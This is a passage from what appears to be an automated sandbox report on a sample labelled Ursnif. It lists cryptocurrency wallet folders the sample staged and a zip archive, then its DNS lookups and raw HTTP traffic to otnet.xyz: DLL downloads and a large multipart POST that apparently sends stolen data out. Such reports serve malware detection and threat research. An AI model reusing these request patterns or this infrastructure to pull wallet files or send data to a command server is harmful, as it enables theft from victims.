  652. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\ElectronCash",
  653. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\Electrum",
  654. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\ElectrumLTC",
  655. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\Ethereum",
  656. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\Exodus",
  657. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\FlorinCoin",
  658. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\Franko",
  659. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\FreiCoin",
  660. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\GoldCoinGLD",
  661. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\InfiniteCoin",
  662. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\IOCoin",
  663. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\IxCoin",
  664. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\JAXX",
  665. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\Litecoin",
  666. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\MegaCoin",
  667. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\MinCoin",
  668. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\MultiDoge",
  669. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\NameCoin",
  670. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\PrimeCoin",
  671. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\TerraCoin",
  672. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\YACoin",
  673. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\Zcash",
  674. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets",
  675. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\CA_00000000-0000-0000-0000-0000000000004771908667.zip",
  676. "C:\\Users\\user\\AppData\\Local\\Temp\\Ursnif_a85132af1b5651472eb4ad093e1bb0f5.exe"
  677.  
  678.  
  679. * Modified Registry Keys:
  680. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\Winmgmt\\Type"
  681.  
  682.  
  683. * Deleted Registry Keys:
  684.  
  685. * DNS Communications:
  686.  
  687. "type": "A",
  688. "request": "otnet.xyz",
  689. "answers":
  690.  
  691. "data": "209.141.47.33",
  692. "type": "A"
  693.  
  694.  
  695.  
  696.  
  697. "type": "A",
  698. "request": "ip-api.com",
  699. "answers":
  700.  
  701. "data": "72.11.140.50",
  702. "type": "A"
  703.  
  704.  
  705. "data": "66.212.29.250",
  706. "type": "A"
  707.  
  708.  
  709.  
  710.  
  711.  
  712. * Domains:
  713.  
  714. "ip": "209.141.47.33",
  715. "domain": "otnet.xyz"
  716.  
  717.  
  718. "ip": "72.11.140.50",
  719. "domain": "ip-api.com"
  720.  
  721.  
  722.  
  723. * Network Communication - ICMP:
  724.  
  725. * Network Communication - HTTP:
  726.  
  727. "count": 1,
  728. "body": "--1BEF0A57BE110FD467A--\r\n",
  729. "uri": "http://otnet.xyz/141",
  730. "user-agent": "",
  731. "method": "POST",
  732. "host": "otnet.xyz",
  733. "version": "1.1",
  734. "path": "/141",
  735. "data": "POST /141 HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nContent-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A\r\nContent-Length: 25\r\nHost: otnet.xyz\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n--1BEF0A57BE110FD467A--\r\n",
  736. "port": 80
  737.  
  738.  
  739. "count": 1,
  740. "body": "",
  741. "uri": "http://otnet.xyz/freebl3.dll",
  742. "user-agent": "",
  743. "method": "GET",
  744. "host": "otnet.xyz",
  745. "version": "1.1",
  746. "path": "/freebl3.dll",
  747. "data": "GET /freebl3.dll HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: otnet.xyz\r\nConnection: Keep-Alive\r\n\r\n",
  748. "port": 80
  749.  
  750.  
  751. "count": 1,
  752. "body": "",
  753. "uri": "http://otnet.xyz/freebl3.dll?ddosprotected=1",
  754. "user-agent": "",
  755. "method": "GET",
  756. "host": "otnet.xyz",
  757. "version": "1.1",
  758. "path": "/freebl3.dll?ddosprotected=1",
  759. "data": "GET /freebl3.dll?ddosprotected=1 HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: otnet.xyz\r\nConnection: Keep-Alive\r\nCookie: DFSCOOK=c5528e4cb61f70e4c428633d5104ff7f\r\n\r\n",
  760. "port": 80
  761.  
  762.  
  763. "count": 1,
  764. "body": "",
  765. "uri": "http://otnet.xyz/mozglue.dll",
  766. "user-agent": "",
  767. "method": "GET",
  768. "host": "otnet.xyz",
  769. "version": "1.1",
  770. "path": "/mozglue.dll",
  771. "data": "GET /mozglue.dll HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: otnet.xyz\r\nConnection: Keep-Alive\r\nCookie: DFSCOOK=c5528e4cb61f70e4c428633d5104ff7f\r\n\r\n",
  772. "port": 80
  773.  
  774.  
  775. "count": 1,
  776. "body": "",
  777. "uri": "http://otnet.xyz/msvcp140.dll",
  778. "user-agent": "",
  779. "method": "GET",
  780. "host": "otnet.xyz",
  781. "version": "1.1",
  782. "path": "/msvcp140.dll",
  783. "data": "GET /msvcp140.dll HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: otnet.xyz\r\nConnection: Keep-Alive\r\nCookie: DFSCOOK=c5528e4cb61f70e4c428633d5104ff7f\r\n\r\n",
  784. "port": 80
  785.  
  786.  
  787. "count": 1,
  788. "body": "",
  789. "uri": "http://otnet.xyz/nss3.dll",
  790. "user-agent": "",
  791. "method": "GET",
  792. "host": "otnet.xyz",
  793. "version": "1.1",
  794. "path": "/nss3.dll",
  795. "data": "GET /nss3.dll HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: otnet.xyz\r\nConnection: Keep-Alive\r\nCookie: DFSCOOK=c5528e4cb61f70e4c428633d5104ff7f\r\n\r\n",
  796. "port": 80
  797.  
  798.  
  799. "count": 1,
  800. "body": "",
  801. "uri": "http://otnet.xyz/softokn3.dll",
  802. "user-agent": "",
  803. "method": "GET",
  804. "host": "otnet.xyz",
  805. "version": "1.1",
  806. "path": "/softokn3.dll",
  807. "data": "GET /softokn3.dll HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: otnet.xyz\r\nConnection: Keep-Alive\r\nCookie: DFSCOOK=c5528e4cb61f70e4c428633d5104ff7f\r\n\r\n",
  808. "port": 80
  809.  
  810.  
  811. "count": 1,
  812. "body": "",
  813. "uri": "http://otnet.xyz/vcruntime140.dll",
  814. "user-agent": "",
  815. "method": "GET",
  816. "host": "otnet.xyz",
  817. "version": "1.1",
  818. "path": "/vcruntime140.dll",
  819. "data": "GET /vcruntime140.dll HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: otnet.xyz\r\nConnection: Keep-Alive\r\nCookie: DFSCOOK=c5528e4cb61f70e4c428633d5104ff7f\r\n\r\n",
  820. "port": 80
  821.  
  822.  
  823. "count": 1,
  824. "body": "--1BEF0A57BE110FD467A--\r\n",
  825. "uri": "http://ip-api.com/line/",
  826. "user-agent": "",
  827. "method": "POST",
  828. "host": "ip-api.com",
  829. "version": "1.1",
  830. "path": "/line/",
  831. "data": "POST /line/ HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nContent-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A\r\nContent-Length: 25\r\nHost: ip-api.com\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n--1BEF0A57BE110FD467A--\r\n",
  832. "port": 80
  833.  
  834.  
  835. "count": 1,
  836. "body": "",
  837. "uri": "http://otnet.xyz/",
  838. "user-agent": "",
  839. "method": "POST",
  840. "host": "otnet.xyz",
  841. "version": "1.1",
  842. "path": "/",
  843. "data": "POST / HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nContent-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A\r\nContent-Length: 40736\r\nHost: otnet.xyz\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\nCookie: DFSCOOK=c5528e4cb61f70e4c428633d5104ff7f\r\n\r\n",
  844. "port": 80
  845.  
  846.  
  847.  
  848. * Network Communication - SMTP:
  849.  
  850. * Network Communication - Hosts:
  851.  
  852. * Network Communication - IRC: